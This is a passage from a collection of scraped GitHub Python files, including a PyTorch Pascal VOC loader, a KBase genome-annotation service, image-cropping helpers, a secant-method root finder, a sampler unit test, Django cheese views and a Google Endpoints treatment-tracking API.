except:\n print(\"Could not apply transform\")\n return\n else:\n image = transforms.ToTensor()(img_numpy)\n label = torch.tensor(label_numpy)\n _, h, w = image.shape\n\n # Convert xyxy (min/max) to xywh\n y_min = label[:, 2]\n x_min = label[:, 1]\n x_max = label[:, 3]\n y_max = label[:, 4]\n bb_target = torch.zeros_like(label)\n bb_target[:, 1] = (x_min + x_max) / 2\n bb_target[:, 2] = (y_min + y_max) / 2\n bb_target[:, 3] = x_max - x_min\n bb_target[:, 4] = y_max - y_min\n\n # to convert absolute coordinated into relative coordinates\n bb_target[:, [1, 3]] /= w\n bb_target[:, [2, 4]] /= h\n\n return image, bb_target\n\n def read_label(self, label):\n ele_obj_list = []\n tree = ET.parse(label)\n root = tree.getroot()\n for _object in root.findall('object'):\n list_obj = []\n ele_obj = _object.find('name').text\n list_obj.append(ele_obj)\n\n bbox = _object.find('bndbox')\n for child in bbox:\n # Iterate over xmin/xmax/ymin/ymax within the xml file\n list_obj.append(int(child.text))\n ele_obj_list.append(list_obj)\n\n # change the sting class value to integer value for it to convert into a tensor\n label_list = []\n for item in ele_obj_list:\n class_str = item[0]\n class_int = self.class_dict[class_str]\n item[0] = class_int\n label_list.append(item)\n return label_list\n\n @staticmethod\n def get_image_list(dir_img):\n img_path = Path(dir_img)\n list_imgs = sorted(img_path.rglob('*.jpg')) # this is called a generator\n if len(list_imgs) == 0:\n raise ValueError(f\"No images found, {dir_img}\")\n return list_imgs\n\n @staticmethod\n def get_label_list(dir_label):\n label_path = Path(dir_label)\n list_labels = sorted(label_path.rglob('*.xml'))\n if len(list_labels) == 0:\n raise ValueError(f\"No images found, {dir_label}\")\n return list_labels\n\n\ndef collate_fn(batch):\n \"\"\"\n The function creates a batch of images and labels.\n We need to use a custom collate func because we cannot directly create a batch of label tensors, since the number\n of bounding boxes per image is different (cannot have tensor of shape BxNx5, because N is variable per image).\n\n Args:\n batch: List of outputs from each dataset instance in Dataloader\n\n Returns:\n Tensor: Image. Shape=[b, c, h, w]\n Tensor: labels. Shape=[N, 6] (img_id, cls_id, x, y, w, h). img_id is in range [0, batch_size].\n \"\"\"\n batch = [data for data in batch if data is not None]\n imgs, bb_targets = list(zip(*batch))\n\n # Resize images to input shape\n imgs = torch.stack([img for img in imgs])\n\n # Add sample index to targets.\n # If each label is shape (N, 5), we concatenate along the 0th axis. To distinguish bboxes of different images,\n # we add an image index to the 1st axis.\n for i, boxes in enumerate(bb_targets):\n boxes[:, 0] = i\n bb_targets = torch.cat(bb_targets, 0)\n\n return imgs, bb_targets\n\n\ndef draw_bbox(img, label):\n img_np = (img.numpy() * 255).astype(np.uint8)\n img_np = img_np.transpose((1, 2, 0)) #to change the order of channel\n height, width, _ = img_np.shape\n\n # Convert to absolute coords\n label[:, [2, 4]] *= width\n label[:, [3, 5]] *= height\n\n # Convert to int\n label = label.round().int()\n\n # Convert xywh to xyxy (min/max)\n label_xyxy = utils.xywh_to_xyxy(label)\n\n label_np = label_xyxy.numpy()\n img_opencv = cv2.cvtColor(img_np, cv2.COLOR_RGB2BGR)\n for box in label_np:\n start_point = (box[2], box[3])\n end_point = (box[4], box[5])\n color = (255, 0, 0)\n thickness = 2\n image = cv2.rectangle(img_opencv, start_point, end_point, color, thickness)\n return image\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dir_root\", type=Path, required=True,\n help=\"Root directory for train. Contains the VOCdevkit dir\")\n args = parser.parse_args()\n\n dir_root = args.dir_root\n if not dir_root.is_dir():\n raise ValueError(f\"Not a directory: {dir_root}\")\n\n dataset = PascalVOC(dir_root, transform=get_transforms(img_size=416))\n print(\"Size of dataset: \", len(dataset))\n\n training_generator = torch.utils.data.DataLoader(dataset, batch_size=2, shuffle=False, collate_fn=collate_fn)\n\n for idx, batch in enumerate(training_generator):\n images, labels = batch\n\n img_bbox = []\n for img_idx, img in enumerate(images):\n # single image and its label\n label_xyxy = utils.select_bbox_from_img_id(labels, img_idx)\n\n img = draw_bbox(img, label_xyxy)\n img_bbox.append(img)\n\n concat_img = np.concatenate(img_bbox, axis=1)\n cv2.imwrite(f\"output/dataset_sample_batch_{idx}.jpg\", concat_img)\n\n if idx >= 1:\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"samiksha-singh/my_pytorch_exercises","sub_path":"yolov3_samiksha/dataset_Pascal.py","file_name":"dataset_Pascal.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31264177106","text":"# -*- coding: utf-8 -*-\n#BEGIN_HEADER\n\nimport os\nimport sys\nimport shutil\nimport traceback\nimport uuid\nfrom pprint import pprint, pformat\n\nfrom biokbase.workspace.client import Workspace\n\n# utilities for unpacking things- could switch to functions in DataFileUtil when available\nimport biokbase.Transform.script_utils as script_utils\n\nimport trns_transform_Genbank_Genome_to_KBaseGenomeAnnotations_GenomeAnnotation as uploader\nfrom DataFileUtil.DataFileUtilClient import DataFileUtil\n\n# For Genome to genbank downloader\nfrom doekbase.data_api.downloaders import GenomeAnnotation\nfrom doekbase.data_api.annotation.genome_annotation.api import GenomeAnnotationAPI as GenomeAnnotationAPI\n\n#END_HEADER\n\n\nclass GenomeAnnotationFileUtil:\n '''\n Module Name:\n GenomeAnnotationFileUtil\n\n Module Description:\n \n '''\n\n ######## WARNING FOR GEVENT USERS #######\n # Since asynchronous IO can lead to methods - even the same method -\n # interrupting each other, you must be *very* careful when using global\n # state. A method could easily clobber the state set by another while\n # the latter method is running.\n #########################################\n VERSION = \"0.0.1\"\n GIT_URL = \"https://github.com/rsutormin/GenomeAnnotationFileUtil\"\n GIT_COMMIT_HASH = \"60583507a89da477f8e7b50cfc69c387a6874728\"\n \n #BEGIN_CLASS_HEADER\n #END_CLASS_HEADER\n\n # config contains contents of config file in a hash or None if it couldn't\n # be found\n def __init__(self, config):\n #BEGIN_CONSTRUCTOR\n self.workspaceURL = config['workspace-url']\n self.shockURL = config['shock-url']\n self.handleURL = config['handle-service-url']\n self.sharedFolder = config['scratch']\n self.callback_url = os.environ['SDK_CALLBACK_URL']\n self.services = {\n \"workspace_service_url\": self.workspaceURL,\n \"shock_service_url\": self.shockURL,\n \"handle_service_url\": self.handleURL\n }\n #END_CONSTRUCTOR\n pass\n \n\n def genbank_to_genome_annotation(self, ctx, params):\n \"\"\"\n :param params: instance of type \"GenbankToGenomeAnnotationParams\"\n (file_path or shock_id -- Local path or shock_id of the uploaded\n file with genome sequence in GenBank format or zip-file with\n GenBank files. genome_name -- The name you would like to use to\n reference this GenomeAnnotation. If not supplied, will use the\n Taxon Id and the data source to determine the name. taxon_wsname -\n name of the workspace containing the Taxonomy data, defaults to\n 'ReferenceTaxons') -> structure: parameter \"file_path\" of String,\n parameter \"shock_id\" of String, parameter \"ftp_url\" of String,\n parameter \"genome_name\" of String, parameter \"workspace_name\" of\n String, parameter \"source\" of String, parameter \"taxon_wsname\" of\n String, parameter \"convert_to_legacy\" of type \"boolean\" (A boolean\n - 0 for false, 1 for true. @range (0, 1))\n :returns: instance of type \"GenomeAnnotationDetails\" -> structure:\n parameter \"genome_annotation_ref\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: details\n #BEGIN genbank_to_genome_annotation\n\n print('genbank_to_genome_annotation -- paramaters = ')\n pprint(params)\n\n # validate input and set defaults. Note that because we don't call the uploader method\n # as a stand alone script, we do the validation here.\n if 'workspace_name' not in params:\n raise ValueError('workspace_name field was not defined')\n workspace_name = params['workspace_name']\n\n if 'genome_name' not in params:\n raise ValueError('genome_name field was not defined')\n genome_name = params['genome_name']\n\n source = 'Genbank'\n if 'source' in params:\n source = source;\n\n taxon_wsname = 'ReferenceTaxons'\n if 'taxon_wsname' in params:\n taxon_wsname = params['taxon_wsname']\n\n # other options to handle\n # release\n # taxon_reference\n # exclude_feature_types\n # type\n\n\n # construct the input directory where we stage files\n input_directory = os.path.join(self.sharedFolder, 'genome-upload-staging-'+str(uuid.uuid4()))\n os.makedirs(input_directory)\n\n # determine how to get the file: if it is from shock, download it. If it\n # is just sitting there, then use it. Move the file to the staging input directory\n\n genbank_file_path = None\n\n if 'file_path' not in params:\n if 'shock_id' not in params:\n if 'ftp_url' not in params:\n raise ValueError('No input file (either file_path, shock_id, or ftp_url) provided')\n else:\n # TODO handle ftp - this creates a directory for us, so update the input directory\n print('calling Transform download utility: script_utils.download');\n print('URL provided = '+params['ftp_url']);\n script_utils.download_from_urls(\n working_directory = input_directory,\n token = ctx['token'], # not sure why this requires a token to download from a url...\n urls = {\n 'ftpfiles': params['ftp_url']\n }\n );\n input_directory = os.path.join(input_directory,'ftpfiles')\n # unpack everything in input directory\n dir_contents = os.listdir(input_directory)\n print('downloaded directory listing:')\n pprint(dir_contents)\n dir_files = []\n for f in dir_contents:\n if os.path.isfile(os.path.join(input_directory, f)):\n dir_files.append(f)\n\n print('processing files in directory...')\n for f in dir_files:\n # unpack if needed using the standard transform utility\n print('unpacking '+f)\n script_utils.extract_data(filePath=os.path.join(input_directory,f))\n\n else:\n # handle shock file\n dfUtil = DataFileUtil(self.callback_url, token=ctx['token'])\n file_name = dfUtil.shock_to_file({\n 'file_path': input_directory,\n 'shock_id': params['shock_id']\n })['node_file_name']\n genbank_file_path = os.path.join(input_directory, file_name)\n else:\n # copy the local file to the input staging directory\n # (NOTE: could just move it, but then this method would have the side effect of moving your\n # file which another SDK module might have an open handle on)\n local_file_path = params['file_path']\n genbank_file_path = os.path.join(input_directory, os.path.basename(local_file_path))\n shutil.copy2(local_file_path, genbank_file_path)\n\n if genbank_file_path is not None:\n print(\"input genbank file =\" + genbank_file_path)\n\n # unpack if needed using the standard transform utility\n script_utils.extract_data(filePath=genbank_file_path)\n\n # do the upload (doesn't seem to return any information)\n uploader.upload_genome(\n logger=None,\n\n shock_service_url = self.shockURL,\n handle_service_url = self.handleURL,\n workspace_service_url = self.workspaceURL,\n\n input_directory=input_directory,\n\n workspace_name = workspace_name,\n core_genome_name = genome_name,\n source = source,\n taxon_wsname = taxon_wsname\n )\n\n #### Code to convert to legacy type if requested\n if 'convert_to_legacy' in params and params['convert_to_legacy']==1:\n from doekbase.data_api.converters import genome as cvt\n print('Converting to legacy type, object={}'.format(genome_name))\n cvt.convert_genome(\n shock_url=self.shockURL,\n handle_url=self.handleURL,\n ws_url=self.workspaceURL,\n obj_name=genome_name,\n ws_name=workspace_name)\n\n # clear the temp directory\n shutil.rmtree(input_directory)\n\n # get WS metadata to return the reference to the object (could be returned by the uploader method...)\n ws = Workspace(url=self.workspaceURL)\n info = ws.get_object_info_new({'objects':[{'ref':workspace_name + '/' + genome_name}],'includeMetadata':0, 'ignoreErrors':0})[0]\n\n details = {\n 'genome_annotation_ref':str(info[6]) + '/' + str(info[0]) + '/' + str(info[4])\n }\n\n\n #END genbank_to_genome_annotation\n\n # At some point might do deeper type checking...\n if not isinstance(details, dict):\n raise ValueError('Method genbank_to_genome_annotation return value ' +\n 'details is not type dict as required.')\n # return the results\n return [details]\n\n def genome_annotation_to_genbank(self, ctx, params):\n \"\"\"\n :param params: instance of type \"GenomeAnnotationToGenbankParams\"\n (genome_ref -- Reference to the GenomeAnnotation or Genome object\n in KBase in any ws supported format OR genome_name +\n workspace_name -- specifiy the genome name and workspace name of\n what you want. If genome_ref is defined, these args are ignored.\n new_genbank_file_name -- specify the output name of the genbank\n file, optional save_to_shock -- set to 1 or 0, if 1 then output is\n saved to shock. default is zero) -> structure: parameter\n \"genome_ref\" of String, parameter \"genome_name\" of String,\n parameter \"workspace_name\" of String, parameter\n \"new_genbank_file_name\" of String, parameter \"save_to_shock\" of\n type \"boolean\" (A boolean - 0 for false, 1 for true. @range (0, 1))\n :returns: instance of type \"GenbankFile\" -> structure: parameter\n \"path\" of String, parameter \"shock_id\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: file\n #BEGIN genome_annotation_to_genbank\n\n print('genome_annotation_to_genbank -- paramaters = ')\n pprint(params)\n\n service_endpoints = {\n \"workspace_service_url\": self.workspaceURL, \n \"shock_service_url\": self.shockURL,\n \"handle_service_url\": self.handleURL\n }\n\n # parse/validate parameters. could do a better job here.\n genome_ref = None\n if 'genome_ref' in params and params['genome_ref'] is not None:\n genome_ref = params['genome_ref']\n else:\n if 'genome_name' not in params:\n raise ValueError('genome_ref and genome_name are not defined. One of those is required.')\n if 'workspace_name' not in params:\n raise ValueError('workspace_name is not defined. This is required if genome_name is specified' +\n ' without a genome_ref')\n genome_ref = params['workspace_name'] + '/' + params['genome_name']\n\n # do a quick lookup of object info- could use this to do some validation. Here we need it to provide\n # a nice output file name if it is not set... We should probably catch errors here and print out a nice\n # message - usually this would mean the ref was bad.\n ws = Workspace(url=self.workspaceURL)\n info = ws.get_object_info_new({'objects':[{'ref':genome_ref}],'includeMetadata':0, 'ignoreErrors':0})[0]\n print('resolved object to:');\n pprint(info)\n\n if 'new_genbank_file_name' not in params or params['new_genbank_file_name'] is None:\n new_genbank_file_name = info[1] + \".gbk\"\n else:\n new_genbank_file_name = params['new_genbank_file_name']\n\n\n # construct a working directory to hand off to the data_api\n working_directory = os.path.join(self.sharedFolder, 'genome-download-'+str(uuid.uuid4()))\n os.makedirs(working_directory)\n output_file_destination = os.path.join(working_directory,new_genbank_file_name)\n\n # do it\n print('calling: doekbase.data_api.downloaders.GenomeAnnotation.downloadAsGBK');\n GenomeAnnotation.downloadAsGBK(\n genome_ref,\n service_endpoints,\n ctx['token'],\n output_file_destination,\n working_directory)\n\n # if we need to upload to shock, well then do that too.\n file = {}\n if 'save_to_shock' in params and params['save_to_shock'] == 1:\n dfUtil = DataFileUtil(self.callback_url, token=ctx['token'])\n file['shock_id'] =dfUtil.file_to_shock({\n 'file_path':output_file_destination,\n 'gzip':0,\n 'make_handle':0\n #attributes: {} #we can set shock attributes if we want\n })['shock_id']\n else:\n file['path'] = output_file_destination\n\n #END genome_annotation_to_genbank\n\n # At some point might do deeper type checking...\n if not isinstance(file, dict):\n raise ValueError('Method genome_annotation_to_genbank return value ' +\n 'file is not type dict as required.')\n # return the results\n return [file]\n\n def export_genome_annotation_as_genbank(self, ctx, params):\n \"\"\"\n A method designed especially for download, this calls 'genome_annotation_to_genbank' to do\n the work, but then packages the output with WS provenance and object info into\n a zip file and saves to shock.\n :param params: instance of type \"ExportParams\" -> structure:\n parameter \"input_ref\" of String\n :returns: instance of type \"ExportOutput\" -> structure: parameter\n \"shock_id\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: output\n #BEGIN export_genome_annotation_as_genbank\n\n # validate parameters\n if 'input_ref' not in params:\n raise ValueError('Cannot export GenomeAnnotation- not input_ref field defined.')\n\n # get WS metadata to get ws_name and obj_name\n ws = Workspace(url=self.workspaceURL)\n info = ws.get_object_info_new({'objects':[{'ref': params['input_ref'] }],'includeMetadata':0, 'ignoreErrors':0})[0]\n\n # export to a file\n file = self.genome_annotation_to_genbank(ctx, { \n 'genome_ref': params['input_ref'], \n 'new_genbank_file_name': info[1]+'.gbk' })[0]\n\n # create the output directory and move the file there\n export_package_dir = os.path.join(self.sharedFolder, info[1])\n os.makedirs(export_package_dir)\n shutil.move(file['path'], os.path.join(export_package_dir, os.path.basename(file['path'])))\n\n # package it up and be done\n dfUtil = DataFileUtil(self.callback_url)\n package_details = dfUtil.package_for_download({\n 'file_path': export_package_dir,\n 'ws_refs': [ params['input_ref'] ]\n })\n\n output = { 'shock_id': package_details['shock_id'] }\n\n #END export_genome_annotation_as_genbank\n\n # At some point might do deeper type checking...\n if not isinstance(output, dict):\n raise ValueError('Method export_genome_annotation_as_genbank return value ' +\n 'output is not type dict as required.')\n # return the results\n return [output]\n\n def status(self, ctx):\n #BEGIN_STATUS\n returnVal = {'state': \"OK\", 'message': \"\", 'version': self.VERSION, \n 'git_url': self.GIT_URL, 'git_commit_hash': self.GIT_COMMIT_HASH}\n #END_STATUS\n return [returnVal]\n","repo_name":"kbaseapps/GenomeAnnotationFileUtil","sub_path":"lib/GenomeAnnotationFileUtil/GenomeAnnotationFileUtilImpl.py","file_name":"GenomeAnnotationFileUtilImpl.py","file_ext":"py","file_size_in_byte":16528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14113767467","text":"from PIL import Image, ExifTags\n\ndef fix_orientation(image):\n \"\"\" Look in the EXIF headers to see if this image should be rotated. \"\"\"\n try:\n for orientation in ExifTags.TAGS.keys():\n if ExifTags.TAGS[orientation] == \"Orientation\":\n break\n exif = dict(image._getexif().items())\n\n if exif[orientation] == 3:\n image = image.rotate(180, expand=True)\n elif exif[orientation] == 6:\n image = image.rotate(270, expand=True)\n elif exif[orientation] == 8:\n image = image.rotate(90, expand=True)\n return image\n except (AttributeError, KeyError, IndexError):\n return image\n\ndef extract_center(image):\n \"\"\" Most of the models need a small square image. Extract it from the center of our image.\"\"\"\n width, height = image.size\n new_width = new_height = min(width, height)\n\n left = (width - new_width) / 2\n top = (height - new_height) / 2\n right = (width + new_width) / 2\n bottom = (height + new_height) / 2\n\n return image.crop((left, top, right, bottom))\n","repo_name":"unofang/KIBICS","sub_path":"dataPreparation/dataClean.py","file_name":"dataClean.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32276456568","text":"from math import *\n\n# input\nep = float(input('nhập vào sai số epsilon = '))\nprint('nhập khoảng cách ly nghiệm (a,b)')\na = float(input('a = '))\nb = float(input('b = '))\ndem = 0\n\ndef f(x): # định nghĩa hàm f(x)\n return log(x)-1\n\nf_a = f(a) \nf_b = f(b)\nS1 = f_a * f_b\n\ndef dx_f(x0): # đạo hàm f'(x)\n return (f(x0+0.00001)-f(x0-0.00001))/(2*0.00001)\n# tính ep0 để thiết lập điều kiện dừng\ndx_fa = dx_f(a)\ndx_fb = dx_f(b)\nS2 = dx_fa * dx_fb\n\nif abs(dx_fa) >= abs(dx_fb): \n Max = abs(dx_fa)\n min = abs(dx_fb)\nelse:\n Max = abs(dx_fb)\n min = abs(dx_fa) \nep0 = (ep*min)/(Max - min)\n\n#kiểm tra xác định dấu không đổi S3 và S2 > 0\ndef dx_dx_f(x): # đạo hàm f''(x)\n return (dx_f(x+0.00001)-dx_f(x-0.00001))/(2*0.00001)\nS3 = dx_dx_f(a)*dx_dx_f(b)\n\nif( S1 < 0 and S2 >0 and S3>0):\n if f_a*dx_dx_f(a) > 0:\n d = a\n x0 = b\n else:\n d = b\n x0 = a\n \n f_x0 = f(x0) \n f_d = f(d) # bước 4\n dx = f_x0*(d-x0)/(f_x0-f_d)\n \n while abs(dx) > ep0:\n x0 += dx\n f_x0 = f(x0)\n f_d = f(d)\n dx = f_x0*(d-x0)/(f_x0-f_d)\n dem +=1\n print(x0)\n \n print('nghiệm x = ',x0,'\\nsố lần lặp = ', dem) \n \nelif (S1==0):\n if a==0: print('nghiệm x = ',a) \n if b==0: print('nghiệm x = ',b) \n \nelse:\n print(\"Khoảng cách ly không hợp lệ, không tồn tại nghiệm duy nhất\")\n","repo_name":"thanthimyhuye2001/1.Hoc_Tap","sub_path":"2.Giai_Tich_So/2. F(X) = 0/2. pp dây cung/code dây cung.py","file_name":"code dây cung.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"12637113396","text":"\"\"\"Unit tests for constant prob sampler.\n\nAuthor: Mengye Ren (mren@cs.toronto.edu)\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nimport unittest\n\nfrom fewshot.data.samplers.constant_prob_sampler import ConstantProbSampler\n\n\nclass Dataset():\n\n def __init__(self, n, m):\n self._cls_dict = self._get_cls_dict(n, m)\n\n def get_cls_dict(self):\n return self._cls_dict\n\n def _get_cls_dict(self, n, m):\n \"\"\"Gets a class dict with n classes and m images per class.\"\"\"\n cls_dict = {}\n counter = 0\n for k in range(n):\n cls_dict[k] = np.arange(counter, counter + m)\n counter += m\n return cls_dict\n\n\nclass ConstantProbSamplerTests(unittest.TestCase):\n\n def test_basic(self):\n n = 10\n m = 10\n sampler = ConstantProbSampler(0)\n sampler.set_dataset(Dataset(n, m))\n s, q = sampler.sample_collection(n, 2, p=0.3)\n print(s)\n print(q)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"renmengye/oc-fewshot-public","sub_path":"fewshot/data/samplers/constant_prob_sampler_tests.py","file_name":"constant_prob_sampler_tests.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"71"}
+{"seq_id":"41302988287","text":"from django.views.generic import ListView, DetailView, CreateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .models import Cheese\n\n\nclass CheeseListView(ListView):\n \"\"\"View of Cheese list\"\"\"\n model = Cheese\n\n\nclass CheeseDetailView(DetailView):\n \"\"\"View of Cheese Detail\"\"\"\n model = Cheese\n\n\nclass CheeseCreateView(LoginRequiredMixin, CreateView):\n \"\"\"View of Create Cheese\"\"\"\n model = Cheese\n fields = ['name', 'description', 'firmness', 'country_of_origin']\n\n def form_valid(self, form):\n \"\"\"Form validation for Add Cheese form.\"\"\"\n form.instance.creator = self.request.user\n return super().form_valid(form)\n","repo_name":"tstefanovska/everycheese","sub_path":"everycheese/cheeses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4257766183","text":"# -*- coding:utf-8 -*-\n\n'''\nCreated on 14/02/2014\n\n@author: Capi\n'''\n\nimport endpoints\nfrom google.appengine.ext import ndb\nfrom protorpc import remote, message_types, messages\n\nfrom api import treatments_messages\nfrom api.treatments_messages import MappedObjectMsg, EntireTreatment, \\\n TreatmentsCollection, DiaryFulfillmentCollectionMsg, ChartPoint, ChartData\nfrom models import *\n\n\n@endpoints.api(name=\"doctor\", version=\"v1\",\n description=\"API for doctor users.\")\nclass ForDoctors(remote.Service):\n\n # Resource Containers\n\n KEY_CONTAINER = endpoints.ResourceContainer(ekey=messages.StringField(1))\n ID_CONTAINER = endpoints.ResourceContainer(id=messages.StringField(1))\n\n ACTION_REQUEST_PARAMS = endpoints.ResourceContainer(fulfillments_range_init=messages.IntegerField(1),\n fulfillments_range_finish=messages.IntegerField(2),\n ekey=messages.StringField(4)\n )\n\n @endpoints.method(treatments_messages.PatientMsg, treatments_messages.PatientMsg,\n path=\"patient\", http_method=\"POST\", name=\"patient.save\")\n def patient_save(self, patient_msg):\n\n patient = Patient(message=patient_msg, parent=ndb.Key(urlsafe=patient_msg.doctor_key))\n patient.put()\n\n patient_msg = patient.to_message(ignore_fields=('doctor_key',))\n\n return patient_msg\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.PatientMsg,\n path=\"patient/get\", http_method=\"GET\", name=\"patient.details\")\n def patient_details(self, request):\n\n patient = ndb.Key(urlsafe=request.ekey).get()\n\n patient_msg = patient.to_message()\n\n return patient_msg\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.TreatmentsCollection,\n path=\"patient/treatments\", http_method=\"GET\", name=\"patient.treatments\")\n def patient_treatments(self, request):\n\n patient_key = ndb.Key(urlsafe=request.ekey)\n treatments = Treatment.query(ancestor=patient_key)\n\n treatments_msgs = []\n\n for t in treatments:\n treatments_msgs.append(t.to_message())\n\n return TreatmentsCollection(treatments=treatments_msgs)\n\n # --------------- Treatments ---------------\n\n @endpoints.method(treatments_messages.TreatmentMsg, treatments_messages.TreatmentMsg,\n path=\"treatment\", http_method=\"POST\", name=\"treatment.save\")\n def treatment_save(self,treatment_msg):\n\n treatment = Treatment(message=treatment_msg, parent=ndb.Key(urlsafe=treatment_msg.patient_key))\n treatment.put()\n treatment.generate_code()\n treatment.is_active = True\n treatment.made_actions_count = 0\n treatment.past_actions_count = 0\n treatment.put()\n\n last_finish_date = None\n\n for a in treatment_msg.actions:\n action = TreatmentAction(message=a, parent=treatment.key)\n action.made_count = 0\n action.past_count = 0\n action.put()\n a.key = action.key.urlsafe()\n\n if (last_finish_date == None):\n last_finish_date = action.finish_date\n else:\n last_finish_date = action.finish_date if action.finish_date > last_finish_date else last_finish_date\n\n treatment.finish_date = last_finish_date\n treatment.put()\n\n treatment_msg = treatment.to_message()\n\n return treatment_msg\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.EntireTreatment,\n path=\"treatment/details\", http_method=\"GET\", name=\"treatment.details\")\n def treatment_details(self,request):\n\n treatment = ndb.Key(urlsafe=request.ekey).get()\n patient = treatment.key.parent().get()\n\n treatment_msg = treatment.to_message()\n treatment_msg.actions = treatment.get_actions_messages()\n\n for action_msg in treatment_msg.actions:\n\n action = TreatmentAction(action_msg)\n\n if (action_msg.measurement): # Revisar por qué no funciona isMeasurement\n action_msg.measurement.chart_data = ChartData(points=[])\n chart_points = []\n\n # Cumplimiento realizados para ser graficados\n fulfillments = Fulfillment.query(ancestor=ndb.Key(urlsafe=action_msg.key)).filter(Fulfillment.decision=='T').order(Fulfillment.for_moment)\n\n for f in fulfillments:\n point = ChartPoint(value=float(f.value), tag=str(f.action_moment))\n chart_points.append(point)\n\n action_msg.measurement.chart_data = ChartData(points=chart_points)\n\n treatment_details = EntireTreatment(treatment=treatment_msg, patient=patient.to_message())\n\n return treatment_details\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.DiaryFulfillmentCollectionMsg,\n path=\"treatment/diary_fullfilments\", http_method=\"GET\", name=\"treatment.diary_fulfillments\")\n def diary_fulfillments(self, request):\n\n response = DiaryFulfillmentCollectionMsg()\n\n treatment_key = ndb.Key(urlsafe=request.ekey)\n\n result = DiaryFulfillment.query(ancestor=treatment_key).order(DiaryFulfillment.day)\n\n for r in result:\n response.diary_fulfillments.append(r.to_message())\n\n return response\n\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.TreatmentsCollection,\n path=\"treatments\", http_method=\"GET\", name=\"treatments.actives\")\n def treatments(self, request):\n\n treatments = Treatment.get_actives_by_doctor(ndb.Key(urlsafe=request.ekey))\n\n treatments_msg = []\n\n for t in treatments:\n treatments_msg.append(t.to_message(with_patient=True))\n\n return TreatmentsCollection(treatments=treatments_msg)\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.ChartData,\n path=\"treatment/measurement/behavior\", http_method=\"GET\", name=\"treatments.measurement.behavior\")\n def measurement_behavior(self, request):\n\n chart_points = []\n\n fulfillments = Fulfillment.query(ancestor=ndb.Key(urlsafe=request.ekey))\n\n for f in fulfillments:\n point = ChartPoint(value=f.value, tag=str(f.day))\n chart_points.append(point)\n\n return ChartData(points=chart_points)\n\n\n @endpoints.method(treatments_messages.MedicamentMsg, treatments_messages.MedicamentMsg,\n path=\"medicament\", http_method=\"POST\", name=\"medicament.save\")\n def medicament_save(self, medicament_msg):\n\n medicament = Medicament(message=medicament_msg)\n medicament.put()\n\n medicament_msg.key = medicament.key.urlsafe()\n\n return medicament_msg\n\n @endpoints.method(message_types.VoidMessage, treatments_messages.Presentations,\n path=\"presentations\", http_method=\"GET\", name=\"presentations.all\")\n def presentations(self, request):\n\n items = [\n MappedObjectMsg(description='Tabletas', for_db='t'),\n MappedObjectMsg(description='Cápsulas'.decode('utf-8'), for_db='c'),\n MappedObjectMsg(description='Jarabe', for_db='j'),\n MappedObjectMsg(description='Ampolla', for_db='a'),\n MappedObjectMsg(description='Inyección'.decode('utf-8'), for_db='i')\n ]\n\n return treatments_messages.Presentations(presentations=items)\n\n @endpoints.method(message_types.VoidMessage, treatments_messages.MedicamentsCollection,\n path=\"medicaments\", http_method=\"GET\", name=\"medicaments.all\")\n def medicaments(self, request):\n\n medicament_msgs = []\n\n medicaments = Medicament.query()\n\n for m in medicaments:\n medicament_msgs.append(m.to_message())\n\n return treatments_messages.MedicamentsCollection(medicaments=medicament_msgs)\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.PatientsCollection,\n path=\"patients\", http_method=\"GET\", name=\"patients.all\")\n def patients(self, request):\n\n doctor = ndb.Key(urlsafe=request.ekey).get()\n\n patients = doctor.patients()\n\n patients_msg = []\n for p in patients:\n patients_msg.append(p.to_message(ignore_fields=('doctor_key',), with_active_treatment=True))\n\n return treatments_messages.PatientsCollection(patients=patients_msg)\n\n @endpoints.method(ACTION_REQUEST_PARAMS, treatments_messages.TreatmentActionMsg,\n path=\"treatment/action\", http_method=\"GET\", name=\"treatment.action.get\")\n def action_details(self, request):\n\n action = ndb.Key(urlsafe=request.ekey).get()\n\n action_msg = action.to_message()\n\n if request.fulfillments_range_init is not None and request.fulfillments_range_finish is not None:\n query = Fulfillment.query(ancestor=action.key).order(Fulfillment.for_moment)\n fulfillments = query.fetch(request.fulfillments_range_finish)\n\n fulfillments_msgs = []\n\n for f in fulfillments:\n\n fulfillments_msgs.append(f.to_message())\n\n action_msg.fulfillments = fulfillments_msgs\n\n return action_msg\n\n\n\n\n\n\n\n\n\n\n","repo_name":"capicarbone/treatments-manager","sub_path":"api/for_doctors.py","file_name":"for_doctors.py","file_ext":"py","file_size_in_byte":9287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
